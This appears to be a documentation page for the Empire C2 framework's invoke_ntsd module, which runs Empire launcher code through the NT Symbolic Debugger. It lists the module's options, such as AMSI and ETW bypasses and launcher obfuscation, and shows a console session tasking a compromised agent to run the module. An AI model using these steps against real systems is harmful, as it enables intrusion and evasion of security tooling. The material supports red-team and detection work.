Invoke-Ntsd - Empire Module


This page contains detailed information about how to use the powershell/code_execution/invoke_ntsd Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Ntsd
Module: powershell/code_execution/invoke_ntsd
Source code [1]: empire/server/modules/powershell/code_execution/invoke_ntsd.yaml
Source code [2]: empire/server/modules/powershell/code_execution/invoke_ntsd.py
MITRE ATT&CK: T1127
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The invoke_ntsd module uses NT Symbolic Debugger to execute Empire launcher code.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_ntsd module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the invoke_ntsd module:

Agent
Agent to run module on.

Arch
Architecture the system is on.
Default value: x64.

BinPath
Binary to set NTSD to debug.
Default value: C:\Windows\System32\calc.exe.

Listener
Listener to use.

Additional Module Options


This is a list of additional options that are supported by the invoke_ntsd module:

Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.

Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.

ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

UploadPath
Path to drop dll (C:\Users\Administrator\Desktop).

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

Invoke_ntsd Example Usage


Here's an example of how to use the invoke_ntsd module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/code_execution/invoke_ntsd

 Author       james fitts                                              
 Background   True                                                     
 Description  Use NT Symbolic Debugger to execute Empire launcher code 
 Language     powershell                                               
 Name         powershell/code_execution/invoke_ntsd                    
 NeedsAdmin   False                                                    
 OpsecSafe    False                                                    
 Techniques   http://attack.mitre.org/techniques/T1127                 


,Record Options----,------------------------------,----------,-------------------------------------,
| Name             | Value                        | Required | Description                         |
|------------------|------------------------------|----------|-------------------------------------|
| Agent            |                              | True     | Agent to run module on.             |
|------------------|------------------------------|----------|-------------------------------------|
| Arch             | x64                          | True     | Architecture the system is on.      |
|------------------|------------------------------|----------|-------------------------------------|
| BinPath          | C:\Windows\System32\calc.exe | True     | Binary to set NTSD to debug.        |
|------------------|------------------------------|----------|-------------------------------------|
| Bypasses         | mattifestation etw           | False    | Bypasses as a space separated list  |
|                  |                              |          | to be prepended to the launcher.    |
|------------------|------------------------------|----------|-------------------------------------|
| Listener         |                              | True     | Listener to use.                    |
|------------------|------------------------------|----------|-------------------------------------|
| Obfuscate        | False                        | False    | Switch. Obfuscate the launcher      |
|                  |                              |          | powershell code, uses the           |
|                  |                              |          | ObfuscateCommand for obfuscation    |
|                  |                              |          | types. For powershell only.         |
|------------------|------------------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1                  | False    | The Invoke-Obfuscation command to   |
|                  |                              |          | use. Only used if Obfuscate switch  |
|                  |                              |          | is True. For powershell only.       |
|------------------|------------------------------|----------|-------------------------------------|
| Proxy            | default                      | False    | Proxy to use for request (default,  |
|                  |                              |          | none, or other).                    |
|------------------|------------------------------|----------|-------------------------------------|
| ProxyCreds       | default                      | False    | Proxy credentials                   |
|                  |                              |          | ([domain\]username:password) to use |
|                  |                              |          | for request (default, none, or      |
|                  |                              |          | other).                             |
|------------------|------------------------------|----------|-------------------------------------|
| UploadPath       |                              | False    | Path to drop dll                    |
|                  |                              |          | (C:\Users\Administrator\Desktop).   |
|------------------|------------------------------|----------|-------------------------------------|
| UserAgent        | default                      | False    | User-agent string to use for the    |
|                  |                              |          | staging request (default, none, or  |
|                  |                              |          | other).                             |
'------------------'------------------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/code_execution/invoke_ntsd) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/code_execution/invoke_ntsd) > set Arch x64
[*] Set Arch to x64
(Empire: usemodule/powershell/code_execution/invoke_ntsd) > set BinPath C:\Windows\System32\calc.exe
[*] Set BinPath to C:\Windows\System32\calc.exe
(Empire: usemodule/powershell/code_execution/invoke_ntsd) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/code_execution/invoke_ntsd) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


  • james fitts

References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.